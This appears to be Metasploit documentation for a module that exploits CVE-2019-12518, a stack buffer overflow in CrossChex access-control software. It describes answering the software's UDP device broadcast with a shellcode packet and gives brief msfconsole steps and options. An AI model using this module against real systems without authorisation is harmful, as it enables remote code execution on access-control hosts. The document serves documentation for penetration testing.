Path: blob/master/documentation/modules/exploit/windows/misc/crosschex_device_bof.md
24988 views
Introduction
CrossChex is a personnel identity verification, access control, and time attendance management system compatible with Windows 7,8 & 10. It uses UDP broadcasts to identify and connect with Access Control devices on a network. The code used to handle a response from an Access Control device is vulnerable to a Stack Buffer Overflow attack on CrossChex versions Crosschex Standard x86 <= V4.3.12. Tracked as CVE-2019-12518, and as such permits arbitrary code execution.
The code used to overflow the Stack Buffer and code an attacker wishes to be executed as a result of the exploit are sent in a single UDP packet as a response to the CrossChex broadcast. As both the exploit and the payload must be contained inside a single UDP packet, an exploit has a maximum size of 8947 Characters.
This module exploits CVE-2019-12518 by listening for a CrossChex "new device" broadcast for a given number of seconds (TIMEOUT). It then responds with a UDP packet containing shellcode for both the Buffer Overflow exploit and the attacker's chosen payload. The Space payload option ensures no payload of too large a size is used to ensure successful exploitation. If a broadcast is not detected within the given TIMEOUT, the module exits with a warning.
Verification Steps
Start
msfconsoleuse windows/misc/crosschex_device_bofset LHOST vboxnet0runOpen CrossChex
Navigate to Device > Add
Select
SearchVerify payload executes correctly
Options
TIMEOUTSeconds module waits for broadcast, defaults to1000.CHOST. Address UDP packet response is sent from. Defaults to0.0.0.0.CPORT. Port UDP packet response is sent from. Defaults to5050as CrossChex expects communication from this port.
Compatible Payloads
Any basic x86 windows payload.
Payload Options
As above.